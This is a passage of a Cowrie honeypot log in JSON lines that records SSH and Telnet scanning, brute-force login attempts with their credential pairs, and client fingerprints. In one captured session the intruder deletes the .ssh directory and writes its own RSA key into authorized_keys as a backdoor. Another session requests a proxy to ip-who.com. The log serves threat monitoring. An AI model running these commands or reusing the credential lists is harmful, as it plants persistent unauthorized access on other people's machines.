cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 4ed0d5b0dc3be39c7f96ba3a3cc77895","sensor":"my-vps","timestamp":"2025-08-28T07:56:58.915252Z","src_ip":"204.76.203.28","session":"56db97ed9c55"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt123","message":"login attempt [ubnt/ubnt123] failed","sensor":"my-vps","timestamp":"2025-08-28T07:56:59.073590Z","src_ip":"204.76.203.28","session":"56db97ed9c55"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:57:00.119775Z","src_ip":"204.76.203.28","session":"56db97ed9c55"}
{"eventid":"cowrie.session.connect","src_ip":"204.76.203.28","src_port":57874,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ad47062c384","protocol":"ssh","message":"New connection: 204.76.203.28:57874 (1.2.3.4:22) [session: 1ad47062c384]","sensor":"my-vps","timestamp":"2025-08-28T07:57:00.897863Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:57:00.977898Z","src_ip":"204.76.203.28","session":"1ad47062c384"}
{"eventid":"cowrie.session.connect","src_ip":"204.76.203.28","src_port":57876,"dst_ip":"1.2.3.4","dst_port":22,"session":"f381f35d10cf","protocol":"ssh","message":"New connection: 204.76.203.28:57876 (1.2.3.4:22) [session: f381f35d10cf]","sensor":"my-vps","timestamp":"2025-08-28T07:57:01.815418Z"}
{"eventid":"cowrie.client.version","version":"CONNECT 204.76.203.28:80 HTTP/1.0","message":"Remote SSH version: CONNECT 204.76.203.28:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-28T07:57:01.874419Z","src_ip":"204.76.203.28","session":"f381f35d10cf"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:57:01.875805Z","src_ip":"204.76.203.28","session":"f381f35d10cf"}
{"eventid":"cowrie.session.connect","src_ip":"204.76.203.28","src_port":57890,"dst_ip":"1.2.3.4","dst_port":22,"session":"89fb48471e3a","protocol":"ssh","message":"New connection: 204.76.203.28:57890 (1.2.3.4:22) [session: 89fb48471e3a]","sensor":"my-vps","timestamp":"2025-08-28T07:57:02.862313Z"}
{"eventid":"cowrie.client.version","version":"CONNECT 204.76.203.28:80 HTTP/1.0","message":"Remote SSH version: CONNECT 204.76.203.28:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-28T07:57:02.907239Z","src_ip":"204.76.203.28","session":"89fb48471e3a"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:57:02.908549Z","src_ip":"204.76.203.28","session":"89fb48471e3a"}
{"eventid":"cowrie.session.connect","src_ip":"204.76.203.28","src_port":53506,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ad0e7be0a2f","protocol":"ssh","message":"New connection: 204.76.203.28:53506 (1.2.3.4:22) [session: 0ad0e7be0a2f]","sensor":"my-vps","timestamp":"2025-08-28T07:57:04.045330Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:57:04.182279Z","src_ip":"204.76.203.28","session":"0ad0e7be0a2f"}
{"eventid":"cowrie.session.connect","src_ip":"204.76.203.28","src_port":53508,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3f7cc32c2cd","protocol":"ssh","message":"New connection: 204.76.203.28:53508 (1.2.3.4:22) [session: e3f7cc32c2cd]","sensor":"my-vps","timestamp":"2025-08-28T07:57:05.181249Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:57:05.410996Z","src_ip":"204.76.203.28","session":"e3f7cc32c2cd"}
{"eventid":"cowrie.session.connect","src_ip":"194.0.234.20","src_port":65105,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee10cfa36b87","protocol":"ssh","message":"New connection: 194.0.234.20:65105 (1.2.3.4:22) [session: ee10cfa36b87]","sensor":"my-vps","timestamp":"2025-08-28T07:57:39.239178Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:57:39.258423Z","src_ip":"194.0.234.20","session":"ee10cfa36b87"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33604,"dst_ip":"1.2.3.4","dst_port":22,"session":"855f71e66cb2","protocol":"ssh","message":"New connection: 212.227.235.229:33604 (1.2.3.4:22) [session: 855f71e66cb2]","sensor":"my-vps","timestamp":"2025-08-28T07:58:05.049617Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:58:05.050899Z","src_ip":"212.227.235.229","session":"855f71e66cb2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:58:05.218763Z","src_ip":"212.227.235.229","session":"855f71e66cb2"}
{"eventid":"cowrie.login.success","username":"root","password":"2wsxXSW@","message":"login attempt [root/2wsxXSW@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:58:05.928914Z","src_ip":"212.227.235.229","session":"855f71e66cb2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:58:06.284070Z","src_ip":"212.227.235.229","session":"855f71e66cb2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T07:58:06.284993Z","src_ip":"212.227.235.229","session":"855f71e66cb2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T07:58:06.286546Z","src_ip":"212.227.235.229","session":"855f71e66cb2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:58:06.456250Z","src_ip":"212.227.235.229","session":"855f71e66cb2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:58:06.858051Z","src_ip":"212.227.235.229","session":"855f71e66cb2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T07:58:06.858838Z","src_ip":"212.227.235.229","session":"855f71e66cb2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T07:58:07.029012Z","src_ip":"212.227.235.229","session":"855f71e66cb2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:58:07.030276Z","src_ip":"212.227.235.229","session":"855f71e66cb2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33606,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c49c2b288c6","protocol":"ssh","message":"New connection: 212.227.235.229:33606 (1.2.3.4:22) [session: 0c49c2b288c6]","sensor":"my-vps","timestamp":"2025-08-28T07:58:07.211176Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:58:07.211988Z","src_ip":"212.227.235.229","session":"0c49c2b288c6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:58:07.387423Z","src_ip":"212.227.235.229","session":"0c49c2b288c6"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T07:58:08.131939Z","src_ip":"212.227.235.229","session":"0c49c2b288c6"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:58:09.310809Z","src_ip":"212.227.235.229","session":"0c49c2b288c6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33620,"dst_ip":"1.2.3.4","dst_port":22,"session":"01ae94bc9529","protocol":"ssh","message":"New connection: 212.227.235.229:33620 (1.2.3.4:22) [session: 01ae94bc9529]","sensor":"my-vps","timestamp":"2025-08-28T07:58:09.480727Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:58:09.481732Z","src_ip":"212.227.235.229","session":"01ae94bc9529"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:58:09.654498Z","src_ip":"212.227.235.229","session":"01ae94bc9529"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:58:10.386184Z","src_ip":"212.227.235.229","session":"01ae94bc9529"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":58158,"dst_ip":"1.2.3.4","dst_port":22,"session":"379a821e9a4e","protocol":"ssh","message":"New connection: 196.251.86.249:58158 (1.2.3.4:22) [session: 379a821e9a4e]","sensor":"my-vps","timestamp":"2025-08-28T07:58:10.538954Z"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:58:10.555439Z","src_ip":"212.227.235.229","session":"855f71e66cb2"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:58:10.560338Z","src_ip":"212.227.235.229","session":"01ae94bc9529"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:58:11.249834Z","src_ip":"196.251.86.249","session":"379a821e9a4e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T07:58:11.250741Z","src_ip":"196.251.86.249","session":"379a821e9a4e"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:58:14.059971Z","src_ip":"196.251.86.249","session":"379a821e9a4e"}
{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:58:15.686752Z","src_ip":"196.251.86.249","session":"379a821e9a4e"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":59244,"dst_ip":"1.2.3.4","dst_port":23,"session":"a469aec11957","protocol":"telnet","message":"New connection: 8.222.212.69:59244 (1.2.3.4:23) [session: a469aec11957]","sensor":"my-vps","timestamp":"2025-08-28T07:58:38.697942Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46064,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9f33b40c7c9","protocol":"ssh","message":"New connection: 212.227.235.229:46064 (1.2.3.4:22) [session: a9f33b40c7c9]","sensor":"my-vps","timestamp":"2025-08-28T07:58:57.521054Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T07:58:57.660679Z","src_ip":"212.227.235.229","session":"a9f33b40c7c9"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T07:58:57.833834Z","src_ip":"212.227.235.229","session":"a9f33b40c7c9"}
{"eventid":"cowrie.login.success","username":"root","password":"root123","message":"login attempt [root/root123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:58:59.382426Z","src_ip":"212.227.235.229","session":"a9f33b40c7c9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T07:58:59.707306Z","session":"a9f33b40c7c9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T07:59:00.006240Z","src_ip":"212.227.235.229","session":"a9f33b40c7c9"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:59:00.647847Z","src_ip":"212.227.235.229","session":"a9f33b40c7c9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58806,"dst_ip":"1.2.3.4","dst_port":22,"session":"9069d08e7543","protocol":"ssh","message":"New connection: 212.227.235.229:58806 (1.2.3.4:22) [session: 9069d08e7543]","sensor":"my-vps","timestamp":"2025-08-28T07:59:06.285296Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T07:59:06.286785Z","src_ip":"212.227.235.229","session":"9069d08e7543"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-